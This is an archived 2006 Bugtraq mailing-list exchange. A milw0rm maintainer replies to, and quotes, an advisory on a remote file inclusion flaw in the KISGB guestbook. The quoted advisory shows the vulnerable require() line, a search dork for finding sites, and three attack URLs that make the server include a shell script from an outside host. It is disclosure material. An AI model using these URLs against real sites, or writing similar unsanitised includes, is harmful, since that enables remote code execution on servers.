Re: Multiple Remote Vulnerabilities in KISGB

To: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan@xxxxxxxxx>
Subject: Re: Multiple Remote Vulnerabilities in KISGB
From: str0ke <str0ke@xxxxxxxxxxx>
Date: Fri, 22 Dec 2006 16:08:41 -0600
Cc: bugtraq@xxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx, org@xxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx, admin@xxxxxxxxxx, vuln@xxxxxxxxxxx, submit@xxxxxxxxxxx
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:sender:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; b=L89m4MqwHtSxPAPwWR0PlEP+T81GOAbzxSetBTzVllHA2bn9jUU1E2YauaJJl7qIHitavIpLolHF670JhRm6Ku6osrqTJSaVlumJrRKVEFwPapVeVgMF8RF/dQODyy26+v06SeoH3C2fdamixZIJs5nhChl/3JSxbXBy3qardxI=
In-reply-to: <558f59870612221255s506cfc28j46690c823bb16b86@xxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <558f59870612221255s506cfc28j46690c823bb16b86@xxxxxxxxxxxxxx>
Sender: milw0rm@xxxxxxxxx

Dear 0o_zeus_o0 elitemexico.org,

Thanks, this won't be going up since this was posted on milw0rm today
around 4-6 hours ago for the original author mdx.

http://www.milw0rm.com/exploits/2979.

The only affected script is authenticate.php with the
default_path_for_themes variable.  The rest of them just
include/require the vulnerable script.

/str0ke

On 12/22/06, 0o_zeus_o0 elitemexico.org <zeus.olimpusklan@xxxxxxxxx> wrote:

###########################################################################
# Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus@xxxxxxxxxxxxxxx
# Website: www.diosdelared.com
# Date: 22/12/06
# Risk: critical
# Vendor Url: http://sourceforge.net/projects/kisgb ,
http://ravenphpscripts.com
# Affected Software: Keep It Simple Guest Book
# search: inurl:kisgb , intitle:KISGB
#
#Info:
##################################################################
#Bug is risky by since it is possible to be included I cosay malisioso
#that allows to see or to modify the archives
#code:
#if (isset($default_path_for_themes))
require("$default_path_for_themes/$theme");
#else require("$path_to_themes/$theme");
##################################################################
#
#
#http://site/path/gbpath/authenticate.php?path_to_themes=
http://shellsite.com/php.gif?
#
#http://site/path/gbpath/admin.php?default_path_for_themes=http://shellsite.com/php.gif?
#
#http://site/path/gbpath/upconfig.php?default_path_for_themes=
http://shellsite.com/php.gif?
##################################################################
#VULNERABLE VERSIONS
##################################################################
# 5.0.0
#
##################################################################
#Contact information
#0o_zeus_o0
#zeus@xxxxxxxxxxxxxxx
#www.diosdelared.com
##################################################################
#greetz: S.S.M, sams, a mi beba
#Original Advisory: http://diosdelared.com/15.txt
##################################################################

Prev by Date: Re: Multiple Remote Vulnerabilities in KISGB
Next by Date: ZDI-06-052: Novell NetMail NMAP STOR Buffer Overflow Vulnerability
Previous by thread: Re: Multiple Remote Vulnerabilities in KISGB
Next by thread: ZDI-06-052: Novell NetMail NMAP STOR Buffer Overflow Vulnerability
Index(es):
- Date
- Thread